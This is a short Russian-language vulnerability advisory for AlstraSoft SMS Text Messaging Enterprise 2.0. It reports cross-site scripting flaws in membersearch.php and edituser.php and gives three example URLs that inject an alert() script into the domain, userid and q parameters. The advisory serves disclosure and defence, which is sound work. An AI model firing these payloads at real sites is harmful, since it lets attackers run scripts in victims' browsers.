Программа: AlstraSoft SMS Text Messaging Enterprise 2.0
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в сценариях membersearch.php и edituser.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://www.example.com/admin/membersearch.php?pagina=17 &q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://www.example.com/admin/edituser.php?userid=Walltrapas "><script>alert()</script>
http://www.example.com/admin/membersearch.php?q=%22%3E%3C script%3Ealert%28%29%3C%2Fscript%3E&B1=Submit
